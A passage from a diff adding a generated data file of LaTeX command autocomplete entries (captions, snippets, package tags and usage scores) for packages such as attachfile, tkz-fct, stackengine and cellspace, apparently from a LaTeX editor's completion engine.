0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'attachfile-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'attachfile-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'attachfile-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'attachfile-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'attachfile-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'attachfile-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'attachfile-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'attachfile-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'attachfile-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + 
meta: 'attachfile-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'attachfile-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'attachfile-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'attachfile-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'attachfile-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'attachfile-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'attachfile-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'attachfile-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'attachfile-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'attachfile-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'attachfile-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'attachfile-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'attachfile-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'attachfile-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'attachfile-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'attachfile-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'attachfile-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'attachfile-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'attachfile-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'attachfile-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'attachfile-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + 
score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'attachfile-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'attachfile-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'attachfile-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'attachfile-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'attachfile-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'attachfile-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'attachfile-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'attachfile-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'attachfile-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'attachfile-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'attachfile-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'attachfile-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'attachfile-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'attachfile-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'attachfile-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'attachfile-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'attachfile-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'attachfile-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'attachfile-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'attachfile-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'attachfile-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'attachfile-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'attachfile-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'attachfile-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'attachfile-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + 
snippet: '\\subsubsectionautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'attachfile-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'attachfile-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'attachfile-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'attachfile-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'attachfile-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'attachfile-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'attachfile-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + 
snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'attachfile-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'attachfile-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'attachfile-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'attachfile-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'attachfile-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + ], + doc: [ + { + caption: '\\do', + snippet: '\\do', + meta: 'doc-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\verb', + snippet: '\\verb', + meta: 'doc-cmd', + score: 0.1323269725886312, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'doc-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'doc-cmd', + score: 0.0072203369120285256, + }, + ], + 'tkz-fct': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: 
'\\expandafter', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-fct-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'tkz-fct-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'tkz-fct-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tkz-fct-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tkz-fct-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tkz-fct-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-fct-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tkz-fct-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-fct-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tkz-fct-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tkz-fct-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tkz-fct-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', 
+ meta: 'tkz-fct-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tkz-fct-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-fct-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tkz-fct-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-fct-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tkz-fct-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tkz-fct-cmd', + score: 0.2864294797053033, + }, + ], + notes2bib: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'notes2bib-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'notes2bib-cmd', + score: 0.2864294797053033, + }, + ], + stackengine: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'stackengine-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'stackengine-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'stackengine-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'stackengine-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'stackengine-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'stackengine-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'stackengine-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'stackengine-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'stackengine-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'stackengine-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: 
'\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'stackengine-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'stackengine-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'stackengine-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'stackengine-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'stackengine-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'stackengine-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'stackengine-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'stackengine-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'stackengine-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'stackengine-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'stackengine-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'stackengine-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'stackengine-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'stackengine-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'stackengine-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'stackengine-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'stackengine-cmd', + score: 0.008565354665444157, + }, + ], + cellspace: [ + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'cellspace-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'cellspace-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'cellspace-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'cellspace-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'cellspace-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'cellspace-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'cellspace-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'cellspace-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + 
meta: 'cellspace-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'cellspace-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'cellspace-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'cellspace-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'cellspace-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'cellspace-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'cellspace-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'cellspace-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'cellspace-cmd', + score: 0.028955796305270766, + }, + ], + zxjatype: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'zxjatype-cmd', + score: 0.002671974990314091, + }, + { + 